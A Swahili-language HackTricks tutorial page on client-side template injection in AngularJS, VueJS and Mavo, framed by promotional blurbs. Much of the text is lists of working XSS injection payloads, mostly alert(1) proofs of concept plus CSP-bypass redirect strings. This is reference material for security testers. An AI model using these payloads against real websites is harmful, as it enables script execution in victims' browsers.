7.9 KiB
Kuingiza Kigezo Upande wa Mteja (CSTI)
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
WhiteIntel
WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kuangalia tovuti yao na kujaribu injini yao bure kwa:
{% embed url="https://whiteintel.io" %}
Muhtasari
Ni kama Kuingiza Kigezo Upande wa Server lakini kwenye mteja. SSTI inaweza kuruhusu kutekeleza msimbo kwenye seva ya mbali, CSTI inaweza kuruhusu kutekeleza msimbo wa JavaScript wa aina yoyote kwenye kivinjari cha mwathiriwa.
Kutafuta udhaifu huu ni sawa sana na katika kesi ya SSTI, mkalimani anatarajia kigezo na kukiendesha. Kwa mfano, na mzigo kama {{ 7-7 }}
, ikiwa programu ni dhaifu utaona 0
, na ikiwa sio, utaona asili: {{ 7-7 }}
AngularJS
AngularJS ni mfumo maarufu wa JavaScript ambao huingiliana na HTML kupitia sifa inayoitwa maelekezo, moja muhimu ikiwa ni ng-app
. Mwongozo huu huruhusu AngularJS kusindika yaliyomo ya HTML, kuruhusu utekelezaji wa maelezo ya JavaScript ndani ya mabano mara mbili.
Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML uliotiwa alama na ng-app
, inawezekana kutekeleza msimbo wa JavaScript wa aina yoyote. Hii inaweza kufanikiwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini ni mifano inayoonyesha jinsi msimbo wa JavaScript unaweza kutekelezwa:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
Unaweza kupata mfano wa msingi sana wa udhaifu katika AngularJS katika http://jsfiddle.net/2zs2yv7o/ na katika Burp Suite Academy
{% hint style="danger" %}
Angular 1.6 iliondoa sanduku la mchanga hivyo kutoka kwenye toleo hili, mzigo kama {{constructor.constructor('alert(1)')()}}
au <input ng-focus=$event.view.alert('XSS')>
inapaswa kufanya kazi.
{% endhint %}
VueJS
Unaweza kupata utekelezaji wa Vue ulio na udhaifu katika https://vue-client-side-template-injection-example.azu.now.sh/
Mzigo unaofanya kazi: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%
Na msimbo wa chanzo wa mfano ulio na udhaifu unapatikana hapa: https://github.com/azu/vue-client-side-template-injection-example
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
V3
Machapisho mazuri sana kuhusu CSTI katika VUE yanaweza kupatikana katika https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets
{{_openBlock.constructor('alert(1)')()}}
V2
Aina ya tatu ya mashambulizi ya CSTI inaweza kufanywa kwa kutumia mchanganyiko wa mbinu za kudanganya za kawaida na mbinu za kudanganya za VueJS. Kwa undani zaidi, tafadhali angalia hapa.
{{constructor.constructor('alert(1)')()}}
Credit: Mario Heiderich
Angalia mizigo zaidi ya VUE katika https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected
Mavo
Mzigo:
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
Paylodi zaidi katika https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations
Orodha ya Uchunguzi wa Brute-Force
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
WhiteIntel
WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa utendaji wa bure kuchunguza ikiwa kampuni au wateja wake wame vamiwa na malware za kuiba.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na zisizo za habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa bure kwa:
{% embed url="https://whiteintel.io" %}
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.